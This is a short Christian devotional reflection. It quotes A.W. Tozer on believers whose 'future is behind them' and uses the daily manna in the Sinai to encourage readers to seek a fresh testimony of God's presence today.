A.W. Tozer is one of my favorite writers. Recently, I came across a tidbit of his that caused me to stop and ponder the truth that he spoke. He said, “The Christian’s future is still before him. I will give you time to smile at that, because it sounds like a self-evident bromide if ever one was uttered. But I assure you that it is not a self-evident banality; it is, rather, a proof that we ought to ponder soberly the fact that many Christians already have their future behind them. Their glory is behind them. The only future they have is their past. They are always lingering around the cold ashes of yesterday’s burned-out campfire. Their testimonies indicate it, their outlook and their up look reveal it and their downcast look betrays it! Above all, their backward look indicates it. I always get an uneasy feeling when I find myself with people who have nothing to discuss but the glories of days gone by.”
When wandering in the Sinai desert the children of Israel daily received the fresh new manna of God with fell from heaven overnight. A visible evidence of God’s presence in their midst. As children of God in Christ, we are given each morning the gift of a brand new day, a day in which God our Father wishes to reveal Himself and display His wonders. A fresh sense of His presence with us, a fresh realization of His gracious provision for us. And as God has shown me recently, the best days for a Christian are always ahead of us as we fall deeper and deeper in love with Jesus and learn to lean on Him for every need, spiritual, emotional, physical, and yes, even financial. In another quote, Tozer said, “God being who He is, the inheritance we receive from Him is limitless…it is all of the universe!
And so, when Tozer says that for all too many Christians, the testimonies that they give are of the glory days of the past. Thank God for the glory days of the past and the ways that He has touched our lives along the way, but what has He done for you today? What testimony do you have that expresses that you serve a risen Savior who is in the world TODAY, displaying that He is living no matter when men around you may say?
